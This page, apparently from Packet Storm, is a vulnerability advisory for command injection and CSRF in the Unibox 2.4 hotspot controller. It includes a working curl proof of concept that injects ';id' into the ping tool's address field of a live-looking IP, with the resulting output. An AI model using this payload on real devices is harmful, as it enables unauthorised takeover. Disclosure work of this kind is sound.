exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Unibox 2.4 CSRF / Remote Code Execution

Unibox 2.4 CSRF / Remote Code Execution
Posted Feb 8, 2021
Authored by Kaustubh G. Padwad

Unibox version 2.4 suffers from remote code execution and cross site request forgery vulnerabilities.

tags | exploit, remote, vulnerability, code execution, csrf
SHA-256 | 8dd77b322f43636d3235c2c88700453adfa9865970ffd5dd3a39a083974ecbb8

Unibox 2.4 CSRF / Remote Code Execution

Change Mirror Download
=====================================================
Authenticated Remote Code Execution In Unibox 2.4
=====================================================

. contents:: Table Of Content

Overview
========

Title:- Authenticated command execution in all UNIBOX WiFi Hotspot
Controller.
CVE ID:- Not Yet Assign
Author: Kaustubh G. Padwad
Vendor: Wifi-soft (https://www.wifi-soft.com/)
Products:
1.Unibox SMB
2.UniBox - Enterprise Series
3.UniBox - Campus Series

Tested Version: Unibox U-50 | UniBox 2.4 (Respetive for others)
Severity: Critical

Advisory ID
============
KSA-Dev-009


About the Product:
==================
UniBox is one of the most innovative and reliable Hotspot Controllers in
the market today. You can install UniBox to manage any sized WiFi
network without having to replace any existing infrastructure. With
UniBox, you don't need any other solution for managing WiFi access. It
comes packed with features so just one box is enough to handle all the
functions of WiFi hotspots.

Description:
============
An issue was discovered on Unibox SMB with Unibox 2.4 and poterntially
respected all other devices. There is Code Execution vulnerability via
/tools/ping Function in device which leads to complete device takeover.

Additional Information
======================
The page /tools/ping can be tricked via specially crafted request which
will leads to the code execution on device also device does not
validate the csrftoken,hence By combining this two attack we can form
the Authencated remote code execution on device leads to complete device
takeover.

[Vulnerability Type]
====================
Remote Code Execution (RCE)
Cross Site Request Forgery (CSRF)

How to Reproduce: (POC):
========================
curl -i -s -k -X $'POST' \
-H $'Host: 136.232.224.22' -H $'User-Agent: Mozilla/5.0 (X11; Linux
x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate'
-H $'Referer: http://136.232.224.22/tools/ping' -H $'Content-Type:
application/x-www-form-urlencoded' -H $'Content-Length: 25' -H
$'Connection: close' -H $'Cookie: PHPSESSID=k4l9or0l5xxxxxxxxxxx' -H
$'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=k4l9oxxxxxxxxxx' \
--data-binary $'pingaction=1&address=1;id' \
$'http://136.232.224.22/tools/ping'

Sample OutPut
-------------
<table width=100%>
<tr>
<td>
<br>
</td>
</tr>
<tr>
<td id='pingResponseTable'>
<table border="1" bordercolordark='#E0E0E0'
bordercolorlight='#000000' class="search" cellpadding="0" cellspacing="0">
<tr style='background-color:#3F6C96'>
<td>
<font color="white">
<b>&nbsp;Ping Status</b>
</font>
</td>
<br>
</tr>
<tr style='background-color:#D8E4F8'>
<td>uid=33(www-data) gid=33(www-data) groups=33(www-data)
<br>
</td>
</tr>
</table>


[Affected Component]
/tools/ping

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Code execution]
true

------------------------------------------

[Attack Vectors]
once victim open the crafted url the device will get compromise

Mitigation
==========

Reported to vendor yet no reponse recived

Disclosure:
===========
08-JAN-2020 Discoverd the Vulnerability, and Reported via contact form
20-JAN-2020 Vendor responded via call
23-JAN-2021 Requested Vendor for update
xxxxxxxxxxx No communication recived furter
Hence disclosing under responsible discloser

[Vendor of Product]
WiF-Soft (http://https://www.wifi-soft.com/company/about.php)

credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad



Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close